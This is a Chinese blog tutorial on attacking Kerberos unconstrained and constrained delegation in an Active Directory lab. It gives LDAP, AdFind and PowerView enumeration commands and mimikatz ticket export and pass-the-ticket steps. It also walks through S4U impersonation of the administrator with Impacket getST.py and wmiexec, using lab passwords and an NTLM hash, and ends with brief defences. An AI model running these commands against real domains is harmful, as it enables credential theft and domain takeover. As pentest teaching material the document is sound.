域渗透——Kerberos委派攻击

最新推荐文章于 2024-05-15 09:55:06 发布
最新推荐文章于 2024-05-15 09:55:06 发布
阅读量1k 收藏 7
点赞数
分类专栏: 内网蠕动
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43645782/article/details/118675277
版权

域渗透——Kerberos委派攻击

前言

本文章重点说一下约束委派和非约束委派,,这里的非约束委派需要手动触发比较鸡肋,可以使用非约束委派账户配合printerbug域内提权,这个会单独拿一篇文章出来,还有一种是基于资源的约束委派,留给下一篇文章

环境搭建

这里的域环境搭建就不再细说

主机ip用户主机名
域控192.168.164.133administratorad.test.com
域内主机192.168.164.129testuser.test.com

两台主机均为win2008r2

创建非约束委派账户

注册spn

setspn -U -A MSSQLSvc/mssql.test.com:1433 feipai

注意 这里的feipai用户需要存在
在这里插入图片描述
在这里插入图片描述

创建约束委派账户

注册spn

setspn -U -A MSSQLSvc/mssql.test.com:1433 yuepai

注意 这里的yuepai用户需要存在
配置yuepai对于域内机器user的cifs的委派
在这里插入图片描述

发现域内委派的用户和计算机

当服务账号或者主机被设置为非约束性委派时,其userAccountControl属性会包含TRUSTED_FOR_DELEGATION
当服务账号或者主机被设置为约束性委派时,其userAccountControl属性包含TRUSTED_TO_AUTH_FOR_DELEGATION,且msDS-AllowedToDelegateTo属性会包含被约束的服务
在这里插入图片描述

在这里插入图片描述

发现域内主机主机的一般方法是使用LDAP,可以使用如下方式

ldapsearch

kali自带

查找非约束用户

ldapsearch -x -H ldap://192.168.164.133:389 -D "test@test.com" -b "DC=test,DC=com" -w Tt1234. "(&(samAccountType=805306368)(userAccountControl:1.2.840.113556.1.4.803:=524288))"|grep -iE "distinguishedName"

这里的-D是用户名,-w 的为test用户的密码
在这里插入图片描述

查找非约束机器

ldapsearch -x -H ldap://192.168.164.133:389 -D "test@test.com" -b "DC=test,DC=com" -w Tt1234. "(&(samAccountType=805306369)(userAccountControl:1.2.840.113556.1.4.803:=524288))"|grep -iE "distinguishedName"

在这里插入图片描述
可以看见域控主机默认开启非约束委派

查找约束用户

ldapsearch -x -H ldap://192.168.164.133:389 -D "CN=test,CN=Users,DC=test,DC=com" -b "DC=test,DC=com" -w Tt1234. "(&(samAccountType=805306368)(msds-allowedtodelegateto=*))"|grep -iE "distinguishedName"

在这里插入图片描述

查找约束机器

ldapsearch -x -H ldap://192.168.164.133:389 -D "CN=test,CN=Users,DC=test,DC=com" -b "DC=test,DC=com" -w Tt1234. "(&(samAccountType=805306369)(msds-allowedtodelegateto=*))"|grep -iE "distinguishedName"

ADfind

下载地址

https://www.softpedia.com/get/Programming/Other-Programming-Files/AdFind.shtml

使用参数

AdFind [switches] [-b basedn] [-f filter] [attr list]

参数说明

-b:指定要查询的根节点
-f:LDAP过滤条件
attr list:需要显示的属性

查找非约束委派用户

AdFind.exe -b "DC=test,DC=com" -f "(&(samAccountType=805306368)(userAccountControl:1.2.840.113556.1.4.803:=524288))" cn distinguishedName

在这里插入图片描述

查找非约束委派主机

AdFind.exe -b "DC=test,DC=com" -f "(&(samAccountType=805306369)(userAccountControl:1.2.840.113556.1.4.803:=524288))" cn distinguishedName

在这里插入图片描述

查找约束委派用户

AdFind.exe -b "DC=test,DC=com" -f "(&(samAccountType=805306368)(msds-allowedtodelegateto=*))" cn distinguishedName

查找非约束委派主机

AdFind.exe -b "DC=test,DC=com" -f "(&(samAccountType=805306369)(msds-allowedtodelegateto=*))" cn distinguishedName

PowerView

下载地址

https://github.com/PowerShellMafia/PowerSploit/raw/dev/Recon/PowerView.ps1

查找非约束委派用户

powershell.exe -exec bypass -Command "Import-Module .\powerview.ps1;Get-NetUser -Domain test.com|select name"

报错 原因未知
在这里插入图片描述

查找非约束委派主机

powershell.exe -exec bypass -Command "Import-Module .\powerview.ps1;Get-NetComputer -Domain test.com |select name"

多一个 原因未知
在这里插入图片描述

查找约束委派用户

powershell.exe -exec bypass -Command "Import-Module .\powerview.ps1;Get-DomainUser –TrustedToAuth -domain test.com -Properties distinguishedname,useraccountcontrol,msds-allowedtodelegateto|fl"

ldapdomaindump

https://github.com/dirkjanm/ldapdomaindump

报错 原因未知

python3 ldapdomaindump.py -u domain1\\user -p password 192.168.164.128

查找约束委派主机

powershell.exe -exec bypass -Command "Import-Module .\powerview.ps1;Get-DomainComputer -TrustedToAuth -Domain test.com -Properties distinguishedname,useraccountcontrol,msds-allowedtodelegateto|ft -Wrap -AutoSize"

非约束委派的利用

非约束委派:当user访问service1时,如果service1的服务账号开启了unconstrained delegation(非约束委派),则当user访问service1时会将user的TGT发送给service1并保存在内存中以备下次重用,然后service1 就可以利用这张TGT以user的身份去访问域内的任何服务(任何服务是指user能访问的服务)了

这里的说明参考https://xz.aliyun.com/t/7217#toc-6

1. 用户向`KDC`发送`KRB_AS_REQ`消息请求可转发的`TGT1`2. KDC在`KRB_AS_REP`消息中返回`TGT1`3. 用户根据步骤2中的TGT1请求转发TGT2。

4. KDC在KRB_TGS_REP消息中为user返回TGT2。

5. 用户使用步骤2中返回的TGT1向KDC请求Service1的ST(Service Ticket)

6. TGS在KRB_TGS_REP消息中返回给用户service1的ST。

7. 用户发送KRB_AP_REQ消息请求Service1,KRB_AP_REQ消息中包含了TGT1和Service1的ST、TGT2、TGT2的SessionKey

8. service1使用用户发送过来的的TGT2,并以KRB_TGS_REQ的形式将其发送到KDC,以用户的名义请求service2的ST。

9. KDC在KRB_TGS_REP消息中返回service2到service1的ST,以及service1可以使用的sessionkey。ST将客户端标识为用户,而不是service1。

10. service1通过KRB_AP_REQ以用户的名义向service2发出请求。

11. service2响应service1的请求。

12. 有了这个响应,service1就可以在步骤7中响应用户的请求。

13. 这里的TGT转发委派机制没有限制service1使用的TGT2是来自哪个服务,所以service1可以以用户的名义向KDC索要任何其他服务的票证。

14. KDC返回步骤13中请求的ST

15-16. service1以用户的名义来请求其它服务

TGT1(forwardable TGT)用于访问Service1,TGT2(forwarded TGT)用于访问Service2

触发

首先清除票据

mimikatz "privilege::debug" "kerberos::purge" "exit"

使用域控访问我们的user.test.com

dir \\test\c$

这时候内存中就存在了域管账户的票据

mimikatz "privilege::debug" "sekurlsa::tickets /export" "exit"

在这里插入图片描述

注入票据

mimikatz "privilege::debug" "kerberos::ptt [0;2cb3f0]-2-0-60a00000-Administrator@krbtgt-TEST.COM.kirbi" "exit"

在这里插入图片描述
当然这种情况是比较苛刻的,需要域控主动连接我们,这里有一种方法非约束委派+Spooler打印机服务,单独拿出来说

约束委派的利用

由于非约束委派的不安全性,微软在windows server 2003中引入了约束委派,对Kerberos协议进行了拓展,引入了S4U,其中S4U支持两个子协议:Service for User to Self (S4U2Self)Service for User to Proxy (S4U2proxy),这两个扩展都允许服务代表用户从KDC请求票证。S4U2self可以代表自身请求针对其自身的Kerberos服务票据(ST);S4U2proxy可以以用户的名义请求其它服务的ST,约束委派就是限制了S4U2proxy扩展的范围。

1. 用户向service1发出请求。用户已通过身份验证,但service1没有用户的授权数据。通常,这是由于身份验证是通过Kerberos以外的其他方式验证的。

2. 通过S4U2self扩展以用户的名义向KDC请求用于访问service1的ST1。

3. KDC返回给Service1一个用于用户验证Service1的ST1,该ST1可能包含用户的授权数据。

4. service1可以使用ST中的授权数据来满足用户的请求,然后响应用户。
注:尽管S4U2self向service1提供有关用户的信息,但S4U2self不允许service1代表用户发出其他服务的请求,这时候就轮到S4U2proxy发挥作用了

5. 用户向service1发出请求,service1需要以用户身份访问service2上的资源。

6. service1以用户的名义向KDC请求用户访问service2的ST2

7. 如果请求中包含PAC,则KDC通过检查PAC的签名数据来验证PAC ,如果PAC有效或不存在,则KDC返回ST2给service1,但存储在ST2的cname和crealm字段中的客户端身份是用户的身份,而不是service1的身份。

8. service1使用ST2以用户的名义向service2发送请求,并判定用户已由KDC进行身份验证。

9. service2响应步骤8的请求。

10. service1响应用户对步骤5中的请求。

利用

这里需要域账户的密码或者ntlm

tgt::ask /user:yuepai /domain:test.com /password:Yy1234. /ticket:test.kirbi
tgt::ask /user:yuepai /domain:test.com /NTLM:b4f27a13d0f78d5ad83750095ef2d8ec /ticket:test.kirbi
python3 getST.py -dc-ip 192.168.164.147 test.com/yuepai:Yy1234. -spn cifs/user.test.com -impersonate administrator

在这里插入图片描述
成功获取到这个账户的服务票据
随后使用这张可转发的TGT票据去伪造s4u请求以administrador用户权限访问SPN委派服务

tgs::s4u /tgt:TGT_yuepai@TEST.COM_krbtgt~test.com@TEST.COM.kirbi /user:Administrator@test.com /service:cifs/ad.test.com
export KRB5CCNAME=xxx.ccache
python3 wmiexec.py -k user.test.com -no-pass

之后使用获取到的服务票据导入内存利用即可
这里我个人理解的约束委派就是在约束委派上添加了一个限制,只能通过tgt去请求一个指定的服务,而不是这个用户的所有权限。

防御

高权限用户没有在特殊要求之下设置为不可委派
为了防止凭据被盗微软推出了Protected Users组,适用于Windows Server 2016,Windows Server 2012 R2、 Windows Server 2012

参考文章

https://xz.aliyun.com/t/7217#toc-13
https://xz.aliyun.com/t/8690#toc-59

whojoe
关注
  • 0
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Kerberos中继攻击:滥用无约束委派(下)
systemino的博客
10-10 1039
上一篇文章,我只讲了中继攻击的基本理论,这篇文章,我会举两个示例来及具体说明。 示例1:使用计算机帐户和SpoolService漏洞获取DC同步权限 在第一种情况下,我们将滥用我的internal.corp实验室中的计算机帐户的无约束委派权限。通过攻击用户testuser获得了此主机的管理权限,该用户是该主机上Administrators组的成员。我们将按照上面列出的步骤,首先获取Kerbe...
渗透完全技巧.pdf
10-03
3. **获取控的方法**:攻击者可能利用SYSVOL共享、MS14-068漏洞、Kerberos SPN扫描、Kerberos的黄金和银票攻击服务账号破解、凭证盗窃(如NTLM重放攻击)、Kerberos委派、地址解析协议(ARP)欺骗、zerologon...
委派攻击
01-31 436
委派是指,将内用户的权限委派给服务账号,使得服务账号能以用户权限开展内活动。利用委派可获取管理员权限 委派主要分为三种: 非约束性委派 约束性委派 基于资源的约束性委派 在Windows系统中,只有服务账号和主机账号的属性才有委派功能,普通用户默认是没有的。 01、非约束委派攻击 设置非约束委派 主机账号设置非约束委派: 活动目录中的computers组内的计算机,双...
探索企业内部网络的利器:LDAPDomainDump
最新发布
gitblog_00039的博客
05-15 394
探索企业内部网络的利器:LDAPDomainDump 项目地址:https://gitcode.com/dirkjanm/ldapdomaindump 项目简介 在活动目录(Active Directory)中,通过轻量级目录访问协议(LDAP)可以获取大量有价值的信息,这些信息对于任何已认证的用户或机器都可访问。然而,这些数据通常不易以易于阅读的格式呈现。为了解决这个问题,我们引入了LDAPD...
Kerberos攻击
iteye_16188的博客
12-18 379
参考: 1. [url]http://securityweekly.com/2014/09/26/derbycon-attacking-kerberos-talk-ill-be-checking-out-and-you-should-too/[/url] 2. [url]https://files.sans.org/summit/hackfest2014/PDFs/Kicking%20the%...
深入理解 Kerberoasting 攻击
qq_31812157的博客
03-11 555
是一种允许攻击者窃取使用RC4加密的KRB_TGS票证的技术,以暴力破解应用程序服务HASH来获取其密码Kerberos使用所请求服务的NTLM哈希来加密给定服务主体名称 (SPN) 的KRB_TGS票证。当用户向控制器KDC发送针对已注册SPN的任何服务的TGS 票证请求时,KDC会生成KRB_TGS攻击者可以离线使用例如hashcat来暴力破解服务帐户的密码,因为该票证已使用服务帐户的NTLM 哈希进行了加密。Kerberoasting攻击主要步骤如下1.发现SPN服务。
渗透 | kerberos认证及过程中产生的攻击
st3pby的博客
02-20 6998
Windows认证一般包括本地认证(NTLM HASH)和认证(kerberos)。认证的原理网上有很多文章。如果喜欢听视频课程的话,这里推荐倾旋师傅的分享课本篇文章主要内容是Kerberos认证过程中产生的攻击Kerberos是由麻省理工学院提出的一种网络身份验证协议。它旨在通过使用密钥加密技术为客户端/服务器应用程序提供强身份验证。Kerberos协议有两个基础认证模块:和,以及微软扩展的两个认证模块S4U和PAC。kerberos是一种基于票据的认证方式。
渗透中的DPAPI和Kerberos协议.pdf
08-08
议题分享主要介绍了渗透中数据保护API架构逻辑和Kerberos认证协议的通信流程,同时从攻击者的角度谈了DPAPI和Kerberos协议的利用,最后给出常见攻击思路的防御和缓解措施。 1.1 DPAPI架构 1.2 DPAPI加密机制 1.3 ...
rubeus+spoolsample.zip渗透非约束性委派攻击实验
08-19
在网络安全领,特别是针对Windows环境的渗透测试中,非约束性委派攻击是一种常见的攻击手段。本实验“rubeus+spoolsample.zip”旨在模拟这种攻击,以揭示潜在的安全风险并帮助管理员加强防御措施。以下是关于非...
渗透工具包
01-15
【标题】:“渗透工具包”是指一组专门用于在Windows操作系统环境下进行权限提升和攻击的工具,主要包括mimikatz、psexec以及ms14-068漏洞利用工具。 【描述】:在网络安全领渗透攻击者试图获取对...
内网渗透:详解kerberoast攻击
xnxqwzy的博客
08-21 104
首先再来回顾一下Kerberoast协议的认证过程。kerberoast认证过程算上PAC可以说有四个个阶段。如下图所示[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-HERiyPvB-1692505854066)(https://image.3001.net/images/20230707/1688740766_64a8239e0b73a60776256.png!small?下面这张图总结了每个阶段可能出现的安全问题。
kerberos协议认证与攻击
ATpiu的博客
05-07 2126
kerberos简介/kerberos认证/kerberos攻击/票据传递
关于Kerberos认证的一些攻击手法学习总结
渗透测试研究中心
05-09 1091
Kerberos认证流程前言本文主要分享最近学习的关于Kerberos认证的一些攻击手法,以自我的理解为主,从原理理解切入到基本工具利用来阐述,个人的理解分析较为啰嗦,嫌太兀长的可以跳着看就好,还请各位谅解。如有错误,请师傅们提出更正对于Kerberos认证流程只是简单的描述带过,下面有很多细节没有说明,比如PAC,S4U2SELF(委派),S4U2PROXY(委派)等。详细的解读推荐翻阅d...
内网渗透测试:SPN 与 Kerberoast 攻击讲解
m0_59598029的博客
08-21 141
SPN,ServicePrincipal Names,即服务主体名称,是服务实例(比如:HTTP、SMB、MySQL等服务)在使用 Kerberos身份验证的网络上的唯一标识符,其由服务类、主机名和端口组成。Kerberos 认证过程使用 SPN 将服务实例与服务登录账户相关联,如果想使用Kerberos 协议来认证服务,那么必须正确配置SPN。在使用 Kerberos 身份验证的网络中,必须在内置计算机帐户或用户帐户下为服务器注册SPN。对于内置机器帐户,SPN 将自动进行注册。
Kerberos认证与攻击学习总结
weixin_30278237的博客
08-29 600
0、背景 聆听了n1nty大佬(90后黑客代表)的谆谆指导,学习了n1nty大佬的基本操作,决定总结一下,做一个简要的读书笔记,也把之前自己记录的关于Windows的安全的一些博客能够串联起来。所以首先鸣谢:90后黑客代表n1nty大佬。 1、Kerberos的基本认证 1.1、NTLM的挑战认证 不啰嗦,直接说要点,server接到client的请求认证后,会回复16字节随机数据,也就...
一篇文章讲清楚“什么是委派攻击
dzqxwzoe的博客
11-02 142
委派是大型网络中经常部署的应用模式,给多跳认证带来了很大的便利与此同时也带来了很大的安全隐患。利用委派攻击者可结合其他漏洞进行组合攻击,导致攻击者可获取本地管理员权限甚至管理员权限,还可以制作深度隐藏的后门。委派是指将内用户的权限委派给服务账户,使得服务账户能以用户权限访问内的其他服务。委派的流程图如图所示,内用户A以Kerberos身份验证访问Web服务器请求下载文件,但是真正的文件在后台的文件服务器上。
此计算机必须为委派而被信任_Kerberos约束委派攻击新思路
weixin_32771631的博客
01-10 389
文章来源:https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2019/august/kerberos-resource-based-constrained-delegation-when-an-image-change-leads-to-a-privilege-escalation/除了常规的攻击思路,Ela...
kerberos认证_Kerberos攻击的本质是什么?| 研究:五分钟掌握金票攻击
weixin_39761822的博客
12-03 329
·安全帮出品|安全帮(www.secbang.com)概述:安全帮专注安全教育【伪造原理】黄金票据不需要AS进行交互,需要krbtgt Hash1.kerbors正常验证流程是Client将自己信息发送给AS,然后AS验证后使用krbtgt用户的Hash作为密钥进行加密生成TGT返回给Client。2.那么如果获取到了krbtgt的Hash值,就可以伪造任意4的TGT了。3.因为krb...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值